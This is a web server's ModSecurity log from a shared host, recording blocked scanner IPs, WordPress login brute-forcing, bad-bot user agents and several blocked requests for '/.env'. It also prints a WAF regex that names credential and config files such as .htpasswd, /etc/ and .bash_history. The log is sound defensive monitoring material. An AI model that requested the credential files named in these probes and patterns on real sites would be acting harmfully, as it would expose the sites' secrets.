[Tue May 26 15:02:42.976557 2026] [security2:error] [pid 662057:tid 662302] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVouvT3lMm9tGFVg9RxqQAAAX0"]
[Tue May 26 15:02:44.349354 2026] [security2:error] [pid 662057:tid 662131] [remote 74.7.241.58:40896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVovPT3lMm9tGFVg9Rx1wABgUk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 15:02:44.403455 2026] [security2:error] [pid 662057:tid 662304] [client 136.243.220.209:61106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVovPT3lMm9tGFVg9Rx2QAAAX8"]
[Tue May 26 15:02:45.309079 2026] [security2:error] [pid 662057:tid 662281] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVovPT3lMm9tGFVg9Rx8wAAAWg"]
[Tue May 26 15:02:47.469562 2026] [security2:error] [pid 662057:tid 662230] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVov_T3lMm9tGFVg9RyJgAAATU"]
[Tue May 26 15:02:47.889048 2026] [security2:error] [pid 662057:tid 662268] [client 136.243.220.209:38400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVov_T3lMm9tGFVg9RyNgAAAVs"]
[Tue May 26 15:02:49.625272 2026] [security2:error] [pid 662057:tid 662263] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVowfT3lMm9tGFVg9RyWgAAAVY"]
[Tue May 26 15:02:50.019515 2026] [security2:error] [pid 662057:tid 662238] [client 51.195.203.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVowfT3lMm9tGFVg9RyYQAAAT0"]
[Tue May 26 15:02:51.689530 2026] [security2:error] [pid 662057:tid 662208] [client 136.243.220.209:1969] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVow_T3lMm9tGFVg9RylwAAAR8"]
[Tue May 26 15:02:52.032819 2026] [security2:error] [pid 662057:tid 662291] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVow_T3lMm9tGFVg9RylAAAAXI"]
[Tue May 26 15:02:52.547391 2026] [security2:error] [pid 662057:tid 662242] [client 20.12.194.227:58431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "levantefilmes.contabilidadecarioca.com.br"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVoxPT3lMm9tGFVg9RytgAAAUE"]
[Tue May 26 15:02:52.547522 2026] [security2:error] [pid 662057:tid 662242] [client 20.12.194.227:58431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "levantefilmes.contabilidadecarioca.com.br"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVoxPT3lMm9tGFVg9RytgAAAUE"]
[Tue May 26 15:02:52.674161 2026] [security2:error] [pid 662057:tid 662306] [client 20.12.194.227:58419] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "levantefilmes.contabilidadecarioca.com.br"] [uri "/about.php"] [unique_id "ahVoxPT3lMm9tGFVg9RyugAAAYE"]
[Tue May 26 15:02:52.674323 2026] [security2:error] [pid 662057:tid 662306] [client 20.12.194.227:58419] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "levantefilmes.contabilidadecarioca.com.br"] [uri "/about.php"] [unique_id "ahVoxPT3lMm9tGFVg9RyugAAAYE"]
[Tue May 26 15:02:54.346705 2026] [security2:error] [pid 662057:tid 662279] [client 74.7.228.48:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.agsnails.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVoxfT3lMm9tGFVg9RyzgAAAWY"]
[Tue May 26 15:02:54.347765 2026] [security2:error] [pid 662057:tid 662296] [client 74.7.228.48:36790] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.agsnails.com.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahVoxfT3lMm9tGFVg9RyygABdwc"]
[Tue May 26 15:02:54.654083 2026] [security2:error] [pid 662057:tid 662293] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoxvT3lMm9tGFVg9Ry7QAAAXQ"]
[Tue May 26 15:02:54.804846 2026] [security2:error] [pid 662057:tid 662072] [remote 13.203.52.35:49486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.52.203.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVoxvT3lMm9tGFVg9Ry-wABUw4"]
[Tue May 26 15:02:55.217912 2026] [security2:error] [pid 662057:tid 662068] [remote 216.73.216.240:53482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-contact.php"] [unique_id "ahVox_T3lMm9tGFVg9RzFAABUAo"]
[Tue May 26 15:02:55.479618 2026] [security2:error] [pid 662057:tid 662188] [client 136.243.220.209:52331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVox_T3lMm9tGFVg9RzHwAAAQs"]
[Tue May 26 15:02:55.708932 2026] [security2:error] [pid 662057:tid 662296] [client 160.119.76.48:34548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "example.com"] [uri "/index.php"] [unique_id "ahVox_T3lMm9tGFVg9RzJQAAAXc"]
[Tue May 26 15:02:56.004896 2026] [security2:error] [pid 662057:tid 662198] [client 160.119.76.48:34560] ModSecurity: Access denied with code 406 (phase 1). Pattern match "CONNECT" at REQUEST_METHOD. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "56"] [id "340361"] [rev "3"] [msg "Atomicorp.com WAF Rules: CONNECT method denied"] [data "CONNECT"] [severity "CRITICAL"] [hostname "example.com"] [uri "/"] [unique_id "ahVoyPT3lMm9tGFVg9RzOwAAARU"]
[Tue May 26 15:02:56.004984 2026] [security2:error] [pid 662057:tid 662198] [client 160.119.76.48:34560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "example.com"] [uri "/"] [unique_id "ahVoyPT3lMm9tGFVg9RzOwAAARU"]
[Tue May 26 15:02:56.775146 2026] [security2:error] [pid 662057:tid 662286] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoyPT3lMm9tGFVg9RzSwAAAW0"]
[Tue May 26 15:02:58.427247 2026] [security2:error] [pid 662057:tid 662217] [client 14.237.105.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoyfT3lMm9tGFVg9RzgAAAASg"]
[Tue May 26 15:02:59.075138 2026] [security2:error] [pid 662057:tid 662233] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoyvT3lMm9tGFVg9RzlAAAATg"]
[Tue May 26 15:02:59.673007 2026] [security2:error] [pid 662057:tid 662298] [client 136.243.220.209:11789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoy_T3lMm9tGFVg9RzswAAAXk"]
[Tue May 26 15:03:01.311094 2026] [security2:error] [pid 662057:tid 662211] [client 176.65.139.236:51706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "plenitudotonal.com"] [uri "/.env"] [unique_id "ahVozfT3lMm9tGFVg9Rz1wAAASI"]
[Tue May 26 15:03:01.412705 2026] [security2:error] [pid 662057:tid 662104] [remote 216.73.216.240:34994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-enquiry.php"] [unique_id "ahVozfT3lMm9tGFVg9Rz3gABJi4"]
[Tue May 26 15:03:01.413093 2026] [security2:error] [pid 662057:tid 662103] [remote 216.73.216.240:34994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-privacy.php"] [unique_id "ahVozfT3lMm9tGFVg9Rz3wABJi0"]
[Tue May 26 15:03:01.600419 2026] [security2:error] [pid 662057:tid 662198] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVozfT3lMm9tGFVg9Rz1QAAARU"]
[Tue May 26 15:03:02.882863 2026] [security2:error] [pid 662057:tid 662266] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVozvT3lMm9tGFVg9Rz7wAAAVk"]
[Tue May 26 15:03:03.017263 2026] [security2:error] [pid 662057:tid 662287] [client 176.65.139.239:31506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.plenitudotonal.jhonweb.com"] [uri "/.env"] [unique_id "ahVoz_T3lMm9tGFVg9R0AQAAAW4"]
[Tue May 26 15:03:04.079193 2026] [security2:error] [pid 662057:tid 662309] [client 136.243.220.209:43165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo0PT3lMm9tGFVg9R0GQAAAYQ"]
[Tue May 26 15:03:05.886118 2026] [security2:error] [pid 662057:tid 662230] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo0fT3lMm9tGFVg9R0MAAAATU"]
[Tue May 26 15:03:07.501274 2026] [security2:error] [pid 662057:tid 662207] [client 66.249.92.196:49357] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahVo0_T3lMm9tGFVg9R0ZAAAAR4"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 15:03:07.938228 2026] [security2:error] [pid 662057:tid 662310] [client 136.243.220.209:34382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo0_T3lMm9tGFVg9R0ewAAAYU"]
[Tue May 26 15:03:07.977689 2026] [security2:error] [pid 662057:tid 662305] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo0_T3lMm9tGFVg9R0cwAAAYA"]
[Tue May 26 15:03:08.499924 2026] [security2:error] [pid 662057:tid 662224] [client 66.249.92.1:56329] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahVo1PT3lMm9tGFVg9R0gAAAAS8"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 15:03:09.596991 2026] [security2:error] [pid 662057:tid 662220] [client 66.249.92.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahVo1fT3lMm9tGFVg9R0kQAAASs"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 15:03:10.127073 2026] [security2:error] [pid 662057:tid 662217] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo1fT3lMm9tGFVg9R0oAAAASg"]
[Tue May 26 15:03:10.287616 2026] [security2:error] [pid 662057:tid 662246] [client 68.183.190.139:57987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/news/wp-login.php"] [unique_id "ahVo1vT3lMm9tGFVg9R0rAAAAUU"]
[Tue May 26 15:03:10.912821 2026] [security2:error] [pid 662057:tid 662248] [client 68.183.190.139:58016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/wp-login.php"] [unique_id "ahVo1vT3lMm9tGFVg9R0wgAAAUc"]
[Tue May 26 15:03:11.941822 2026] [security2:error] [pid 662057:tid 662274] [client 136.243.220.209:1565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo1_T3lMm9tGFVg9R06gAAAWE"]
[Tue May 26 15:03:12.281249 2026] [security2:error] [pid 662057:tid 662278] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo1_T3lMm9tGFVg9R05gAAAWU"]
[Tue May 26 15:03:13.566326 2026] [security2:error] [pid 662057:tid 662201] [client 114.119.157.17:34105] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "aastha-enterprises.com"] [uri "/supply.html"] [unique_id "ahVo2fT3lMm9tGFVg9R1GQAAARg"], referer: https://aastha-enterprises.com/
[Tue May 26 15:03:14.731138 2026] [security2:error] [pid 662057:tid 662295] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo2vT3lMm9tGFVg9R1KAAAAXY"]
[Tue May 26 15:03:15.974048 2026] [security2:error] [pid 662057:tid 662274] [client 136.243.220.209:32980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo2_T3lMm9tGFVg9R1XwAAAWE"]
[Tue May 26 15:03:16.758343 2026] [security2:error] [pid 662057:tid 662256] [client 114.119.160.138:54901] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "veganfoodindia.com"] [uri "/2020/09/07/fresh-and-fragrant-yasai-nikko-curry-%F0%9F%A4%A4-%E2%81%A3-for-1-serving%E2%81%A3-1-3-block-firm-tofu%E2%81%A3-1-tin-of-coconut-milk-%E2%81%A3-handful-cauliflower-florets-almost-cooked%E2%81%A3-4/"] [unique_id "ahVo3PT3lMm9tGFVg9R1fwAAAU8"], referer: https://veganfoodindia.com/2020/09/07/fresh-and-fragrant-yasai-nikko-curry-%F0%9F%A4%A4-%E2%81%A3-for-1-serving%E2%81%A3-1-3-block-firm-tofu%E2%81%A3-1-tin-of-coconut-milk-%E2%81%A3-handful-cauliflower-florets-almost-cooked%E2%81%A3-4/
[Tue May 26 15:03:17.822031 2026] [security2:error] [pid 662057:tid 662249] [client 74.7.241.151:34940] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "shirdisaibabatemple.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVo3fT3lMm9tGFVg9R1kwABSE4"]
[Tue May 26 15:03:17.890909 2026] [security2:error] [pid 662057:tid 662201] [client 74.7.228.49:38520] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "shirdisaibabatemple.org.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVo3fT3lMm9tGFVg9R1lAABGE0"]
[Tue May 26 15:03:18.029725 2026] [security2:error] [pid 662057:tid 662234] [client 176.65.139.239:20114] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.courses.bloggertarget.com"] [uri "/.env"] [unique_id "ahVo3vT3lMm9tGFVg9R1lQAAATk"]
[Tue May 26 15:03:18.117404 2026] [security2:error] [pid 662057:tid 662306] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo3fT3lMm9tGFVg9R1jwAAAYE"]
[Tue May 26 15:03:18.809985 2026] [security2:error] [pid 662057:tid 662202] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo3vT3lMm9tGFVg9R1owAAARk"]
[Tue May 26 15:03:20.116340 2026] [security2:error] [pid 662057:tid 662212] [client 136.243.220.209:63677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo4PT3lMm9tGFVg9R11gAAASM"]
[Tue May 26 15:03:21.045642 2026] [security2:error] [pid 662057:tid 662230] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo4PT3lMm9tGFVg9R16AAAATU"]
[Tue May 26 15:03:22.561100 2026] [http2:info] [pid 678998:tid 678998] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:03:23.343395 2026] [security2:error] [pid 678998:tid 679150] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo4p-Rl4i_pgT-iAdZ6AAAABY"]
[Tue May 26 15:03:23.808631 2026] [security2:error] [pid 678998:tid 679207] [client 136.243.220.209:1291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo45-Rl4i_pgT-iAdaEQAAAE8"]
[Tue May 26 15:03:26.079772 2026] [security2:error] [pid 678998:tid 679227] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo5Z-Rl4i_pgT-iAdaUAAAAGM"]
